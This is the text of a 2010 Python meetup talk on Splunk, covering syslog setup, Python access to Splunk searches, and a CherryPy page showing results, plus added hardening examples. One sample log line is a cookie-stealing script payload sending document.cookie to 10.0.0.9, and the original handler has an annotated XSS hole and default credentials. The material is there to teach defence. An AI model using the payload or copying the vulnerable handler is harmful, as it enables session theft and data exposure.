Splunk and Python

Sydney Python October 2010
Kelvin Nicholson
What is Splunk?

“Splunk is the world’s leading software used to
monitor, report and analyze live streaming IT data
as well as terabytes of historical data – located
on-premises or in the cloud.” -Splunk.com
“Splunk is like google for log files.” -Kelvin
Installing Splunk (on Ubuntu)

$ sudo dpkg -i splunk-4.1.5-85165-linux-2.6-intel.deb
$ sudo /opt/splunk/bin/splunk enable boot-start
$ sudo /etc/init.d/splunk start

The .deb installs under /opt/splunk, which is not on PATH, hence the full path.
Started this way Splunk runs as root, which is also what lets it bind the
privileged syslog port 514 used below.
Splunk Welcome Screen
Configuring Splunk
● Configure Splunk to listen for syslog traffic: a UDP network input on port 514
  (the syslog-ng and Cisco senders below) and another on 8514 (OSSEC). UDP syslog
  carries no authentication, so anything that can reach those ports can inject
  events; restrict them to the log sources at the firewall.
● Configure devices to send syslog to Splunk
○ Linux (syslog-ng)
# the destination name must match the one used in the log statement
destination splunk {
    udp("192.168.83.11" port(514));
};
log { source(s_all); destination(splunk); };

● Cisco IOS
no logging console
no logging monitor
logging 192.168.83.11

● OSSEC
<syslog_output>
  <server>192.168.83.11</server>
  <port>8514</port>
</syslog_output>
Splunk Search Screen
Why I Like Splunk (Abridged)
● Dashboards of search terms
■ Security alerts (“login failed for”)
■ STP network issues (“LEARNING AND FORWARDING”)
■ Duplex mismatches
■ Wildcard searches, e.g. “-server2k3-”

● My “WTF” filter (easy filter building)
● Beautiful trending (“cold start” AND “switch01”)
Splunk Simple Filtering
Extending Splunk with Python
● REST API. (Search only)
● Custom search command. (iplocation)
● Configuring scripted alerts. (tweet X alert)
● Directly to backend using Splunk's built-in
modules. (Full module access)
Accessing Splunk Datastore
kelvinn@splunk:/opt/splunk/bin$ ./splunk cmd python
>>> import splunk.auth, splunk.search
>>> # getSessionKey() also stores the key as the module default, which is what
>>> # dispatch() picks up below; that is why 'key' is never passed explicitly
>>> key = splunk.auth.getSessionKey('admin','changeme')
>>> my_job = splunk.search.dispatch('search sypy', namespace='search')
>>> event_list = []
>>> for event in my_job.events:
...     event_list.append(event.fields)
...
>>> print event_list
[{'_si': splunk,main, 'index': main, 'sourcetype': syslog, 'source': udp:514,
'_kv': 1, 'splunk_server': splunk, '_time': 2010-10-06T19:40:37+1100, 'host':
192.168.83.5, '_sourcetype': syslog, '_raw': Oct 6 19:40:37 192.168.83.5 Oct
6 19:40:38 mini kelvinn: hello SyPy, hope you are doing well., '_serial': 0,
'_cd': 0:275}, {'_si': splunk,main, 'index': main, 'sourcetype': syslog, 'source':
udp:514, '_kv': 1, 'splunk_server': splunk, '_time': 2010-10-06T19:39:33+1100,
'host': 192.168.83.5, '_sourcetype': syslog, '_raw': Oct 6 19:39:33
192.168.83.5 Oct 6 19:39:34 mini kelvinn: sypy, '_serial': 1, '_cd': 0:251}]
>>> event_list[0]['_raw']
Oct 6 19:40:37 192.168.83.5 Oct 6 19:40:38 mini kelvinn: hello SyPy, hope you are
doing well.
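The dashboard searches from the "Why I Like Splunk" slide, run as plain Python over events in the shape just printed. This is an added example, not code from the presentation: the first two sample lines are the slide's own events, the rest are constructed (and assume a syslog-ng relay in front of Splunk, so two machines share one sender address), and the matcher only approximates Splunk's search syntax (quoted phrases, bare terms, * wildcards, implicit AND). The double header in every event comes from Splunk's UDP input, which prepends the receive time and the sender address to each datagram unless no_appending_timestamp is set on the input; that is why host above is the address the datagram came from (192.168.83.5) while the hostname the writer supplied (mini) is only visible inside _raw.

```python
import re
from collections import Counter

# Sample events. The first two are copied from the slide output above; the rest
# are constructed for this example and are not from the presentation.
SAMPLE_EVENTS = [
    "Oct  6 19:40:37 192.168.83.5 Oct  6 19:40:38 mini kelvinn: hello SyPy, hope you are doing well.",
    "Oct  6 19:39:33 192.168.83.5 Oct  6 19:39:34 mini kelvinn: sypy",
    "Oct  6 19:41:02 192.168.83.5 Oct  6 19:41:03 mini sshd[2231]: login failed for user root from 10.0.0.9",
    "Oct  6 19:41:09 192.168.83.5 Oct  6 19:41:10 mini sshd[2231]: login failed for user root from 10.0.0.9",
    "Oct  6 19:41:20 192.168.83.5 Oct  6 19:41:21 web01 sshd[812]: login failed for user admin from 10.0.0.9",
    "Oct  6 19:42:10 switch01 1203: %CDP-4-DUPLEX_MISMATCH: duplex mismatch discovered on FastEthernet0/1",
    "Oct  6 19:43:55 switch02 stp: port 1/24 moved to LEARNING AND FORWARDING",
    "Oct  6 19:45:00 switch01 1204: %SYS-5-RESTART: System restarted (cold start)",
    "Oct  6 19:46:12 192.168.83.7 MSWinEventLog: host lab-server2k3-01 reported a service failure",
]

# One BSD syslog header, "Mon dd HH:MM:SS host ". Splunk's UDP input prepends a
# header of its own (receive time, sender address) unless no_appending_timestamp
# is set on the input, which is why the slide's events carry two of them.
HEADER = re.compile(r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) ")


def parse_event(raw):
    """Peel every header off the front of a raw line, then split the remainder
    into program and message. 'sender' is the outermost host (the address the
    datagram came from), 'origin' the innermost one (the hostname the writer
    put in its own header)."""
    hops, rest = [], raw
    while True:
        m = HEADER.match(rest)
        if not m:
            break
        hops.append((m.group("ts"), m.group("host")))
        rest = rest[m.end():]
    program, sep, message = rest.partition(": ")
    if not sep:
        program, message = "", rest
    return {
        "_raw": raw,
        "hops": hops,
        "sender": hops[0][1] if hops else "",
        "origin": hops[-1][1] if hops else "",
        "program": program,
        "message": message,
    }


TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def compile_query(query):
    """Approximate Splunk's term syntax: quoted strings are phrases, bare words
    are terms, '*' is a wildcard, matching is case-insensitive and every term
    must match (implicit AND; a literal AND between terms is accepted)."""
    patterns = []
    for phrase, word in TOKEN.findall(query):
        term = phrase or word
        if term == "AND":
            continue
        regex = ".*".join(re.escape(part) for part in term.split("*"))
        patterns.append(re.compile(regex, re.IGNORECASE))
    return patterns


def matches(event, patterns):
    return all(p.search(event["_raw"]) for p in patterns)


# The searches behind the dashboard panels on the "Why I Like Splunk" slide.
DASHBOARD = {
    "Security alerts": '"login failed for"',
    "STP network issues": '"LEARNING AND FORWARDING"',
    "Duplex mismatches": '"duplex mismatch"',
    "Windows 2003 servers": "*-server2k3-*",
    "Switch cold starts": '"cold start" AND "switch01"',
}


def dashboard_counts(raw_events, dashboard=DASHBOARD):
    """How many events each panel would show."""
    events = [parse_event(r) for r in raw_events]
    return {name: sum(1 for e in events if matches(e, compile_query(q)))
            for name, q in dashboard.items()}


def count_by(raw_events, query, field):
    """Matching events per value of a parsed field, e.g. 'sender' or 'origin'."""
    patterns = compile_query(query)
    events = (parse_event(r) for r in raw_events)
    return dict(Counter(e[field] for e in events if matches(e, patterns)))


if __name__ == "__main__":
    for panel, n in dashboard_counts(SAMPLE_EVENTS).items():
        print("%-22s %d" % (panel, n))
    print("failed logins by sender:", count_by(SAMPLE_EVENTS, '"login failed for"', "sender"))
    print("failed logins by origin:", count_by(SAMPLE_EVENTS, '"login failed for"', "origin"))
```

Running the script prints one count per panel, then the failed-login counts keyed by sender (all three land on 192.168.83.5, which is what a dashboard split by host would show for these events) and by origin (mini: 2, web01: 1). With a relay in the path, either have it forward the original header untouched or extract the inner hostname as a field; otherwise per-host alerting collapses to the relay's address.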
Splunk Architecture

CherryPy built-in, sweet. What can we do with that?
(Splunk Web is itself a CherryPy application, and "splunk cmd python" runs
Splunk's bundled Python with CherryPy and the splunk.* modules already on its
path, so a script started that way can import both.)
Built-in CherryPy Fun

kelvinn@splunk:/opt$ cat splunktest.py
import cherrypy
import splunk.auth, splunk.search

def get_splunk_data():
    # admin/changeme is Splunk's factory default; replace it, and keep the
    # credentials out of the source file
    key = splunk.auth.getSessionKey('admin','changeme')
    my_job = splunk.search.dispatch('search sypy', namespace='search', earliest_time='-24h')
    event_list = []
    for event in my_job.events:
        event_list.append(event.raw)
    return event_list

class HelloWorld:
    def index(self):
        splunk_list = get_splunk_data()
        # the raw log lines go into the HTML response unescaped
        return str(splunk_list)
    index.exposed = True

# 0.0.0.0 listens on every interface, with nothing in front asking for a login
cherrypy.config.update({'server.socket_host': '0.0.0.0',
                        'server.socket_port': 9999,
                        })
cherrypy.quickstart(HelloWorld())

kelvinn@splunk:/opt$ /opt/splunk/bin/splunk cmd python /opt/splunktest.py

P.S. I'm not a CherryPy expert, but it looks pretty
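The same handler hardened, as an added example rather than the presentation's code. The log lines a search returns are untrusted input: they arrived over UDP syslog, which anything able to reach port 514 can write to, and str(splunk_list) above drops them into a text/html response unescaped, so a crafted syslog message becomes script running in the browser of whoever opens the page. The example escapes each line, strips control characters, reads the Splunk credentials from the environment (SPLUNK_USER and SPLUNK_PASS are names assumed here) and binds to loopback. It serves constructed events through the standard library's wsgiref instead of CherryPy or a Splunk session so it runs anywhere; the escaping and the bind settings are what carry over to the CherryPy handler on the slide.

```python
import html
import os
import re

# Constructed events standing in for what get_splunk_data() returns. The
# second one is the kind of line anyone able to reach UDP/514 could inject.
SAMPLE_EVENTS = [
    "Oct  6 19:40:37 192.168.83.5 Oct  6 19:40:38 mini kelvinn: hello SyPy, hope you are doing well.",
    "Oct  6 19:41:02 192.168.83.5 Oct  6 19:41:03 mini kelvinn: "
    "<script>document.location='http://10.0.0.9/?c='+document.cookie</script>",
]

# C0 control characters except tab and newline, plus DEL
CONTROL_CHARS = re.compile(r"[\x00-\x08\x0b-\x1f\x7f]")


def sanitize_event(raw):
    """Drop control characters so a crafted event cannot carry terminal escape
    sequences into a console, a log viewer or a copy-pasted incident note."""
    return CONTROL_CHARS.sub("", raw)


def render_events(events):
    """HTML page listing the events with every line escaped. Log data is
    attacker-influenced input, so it is never concatenated into markup raw."""
    rows = "\n".join(html.escape(sanitize_event(e)) for e in events)
    return ('<!DOCTYPE html><html><head><meta charset="utf-8">'
            "<title>sypy events</title></head><body><pre>%s</pre></body></html>" % rows)


def load_credentials():
    """Read the Splunk account from the environment instead of the source file.
    SPLUNK_USER / SPLUNK_PASS are variable names assumed for this example."""
    user = os.environ.get("SPLUNK_USER")
    password = os.environ.get("SPLUNK_PASS")
    if not user or not password:
        raise RuntimeError("set SPLUNK_USER and SPLUNK_PASS; do not hard-code admin/changeme")
    return user, password


# Same keys as the slide's cherrypy.config.update(...), but bound to loopback;
# expose it only behind a reverse proxy that authenticates the caller.
SERVER_CONFIG = {"server.socket_host": "127.0.0.1", "server.socket_port": 9999}


def app(environ, start_response):
    """Minimal WSGI handler doing the job of HelloWorld.index() on the slide."""
    body = render_events(SAMPLE_EVENTS).encode("utf-8")
    start_response("200 OK", [("Content-Type", "text/html; charset=utf-8"),
                              ("Content-Length", str(len(body)))])
    return [body]


if __name__ == "__main__":
    from wsgiref.simple_server import make_server
    host, port = SERVER_CONFIG["server.socket_host"], SERVER_CONFIG["server.socket_port"]
    httpd = make_server(host, port, app)
    print("serving on http://%s:%d/" % (host, port))
    httpd.serve_forever()
```

Open http://127.0.0.1:9999/ after starting it: the injected line shows up as literal text inside the <pre> block instead of executing. In the CherryPy version the equivalent change is to return render_events(get_splunk_data()) from index() and to set server.socket_host to 127.0.0.1.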
View CherryPy Page
Resources + Thanks
Splunk introduction:
http://www.splunk.com/base/Documentation/4.1.5/Installation/Splunksarchitectureandwhatgetsinstalled
Splunk REST Search (with Python httplib example):
http://www.splunk.com/base/Documentation/4.1.5/Developer/RESTCreateSearch
Custom search command (iplocation):
http://www.splunk.com/base/Documentation/latest/SearchReference/Customsearchiplocation
How to write custom alerts:
http://www.splunk.com/base/Documentation/4.1.5/Admin/Configurescriptedalerts
Using Splunk's built-in Python modules:
http://answers.splunk.com/questions/14/can-i-use-splunks-built-in-python-sdk-in-my-own-scripts
Some information about Splunk's Python SDK:
http://www.splunk.com/base/Documentation/4.1.5/Developer/PySDK

Thanks
Sydney Python Presentation (October 2010) - Splunk
